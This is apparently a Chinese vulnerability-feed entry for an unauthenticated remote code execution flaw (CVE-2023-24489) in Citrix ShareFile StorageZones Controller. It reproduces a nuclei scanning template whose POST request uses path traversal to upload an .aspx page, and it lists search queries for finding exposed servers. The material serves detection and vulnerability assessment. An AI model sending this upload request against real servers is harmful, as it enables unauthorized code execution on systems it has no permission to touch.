漏洞信息 漏洞名称: Citrix ShareFile StorageZones Controller 远程代码执行漏洞
漏洞编号:
漏洞类型: 命令执行
漏洞等级: 严重
漏洞描述: Citrix ShareFile StorageZones Controller是Citrix提供的一个企业级文件共享和同步解决方案,广泛应用于企业环境中,用于安全地存储、同步和共享文件。该产品支持客户管理的存储区域,为企业提供了高度的灵活性和控制能力。
该漏洞是一个未经身份验证的远程代码执行漏洞,技术根源在于对用户输入的不当处理,特别是在处理文件上传请求时,攻击者可以通过构造特殊的HTTP请求,利用路径遍历漏洞上传恶意文件到服务器上的任意位置,从而执行任意代码。这种漏洞的利用不需要任何形式的身份验证,使得攻击者可以轻易地远程控制受影响的系统。
成功利用此漏洞的攻击者可以在受影响的系统上执行任意代码,完全控制系统,进而可能导致敏感数据泄露、服务中断或其他恶意活动。由于漏洞的严重性和易用性,它被标记为CVSS评分9.8(严重级别),且已被列入已知被利用漏洞目录。企业应立即应用Citrix提供的安全补丁或更新,以防范潜在的攻击。
产品厂商: Citrix
产品名称: ShareFile StorageZones Controller
影响版本: *
搜索语法: title=”sharefile storage server”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fcves%2F2023%2FCVE-2023-24489.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 id: CVE-202 3-24489 info: name: Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution author: DhiyaneshDK,dwisiswant0 severity: critical description: | A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-24489 - https:// blog.assetnote.io/ 2023 / 07 / 04 / citrix-sharefile-rce/ - https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489 - https://github.com/20142995/sectool - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1 / AV:N/ AC:L/ PR:N/ UI:N/ S:U/ C:H/ I:H/ A:H cvss-score: 9.8 cve-id: CVE-202 3-24489 cwe-id: CWE-284 ,NVD-CWE-Other epss-score: 0.94389 epss-percentile: 0.99965 cpe: cpe:2.3 :a:citrix:sharefile_storage_zones_controller:* :* :* :* :* :* :* :* metadata: verified: true max-request: 257 vendor: citrix product: sharefile_storage_zones_controller shodan-query: - title:"ShareFile Storage Server" - http.title:"sharefile storage server" fofa-query: title= "sharefile storage server" google-query: intitle:"sharefile storage server" tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrixvariables: fileName: '{{rand_base(8 )}}'flow: http(1 ) && http(2 )http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: word words: - "ShareFile Storage Server" - "ShareFile" - "documentum" condition: or internal: true - raw: - raw: - | POST / documentum/ upload.aspx? parentid= {{url_encode(padding)}}&raw= 1 &unzip= on&uploadid= {{fileName}}\..\..\..\cifs&filename= {{fileName}}.aspx HTTP/1.1 Host: {{Hostname}} < %@ Page Language= "C#" Debug= "true" Trace= "false" %> < script Language= "c#" runat= "server" > void Page_Load(object sender, EventArgs e) { Response.Write("{{randstr}}" ); } < / script> payloads: padding: helpers/payloads/citrix_paddings.txt stop-at-first-match: true matchers: - type: dsl dsl: - 'body == "ERROR: The method or operation is not implemented." ' - 'status_code == 200 ' condition: and extractors: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx" '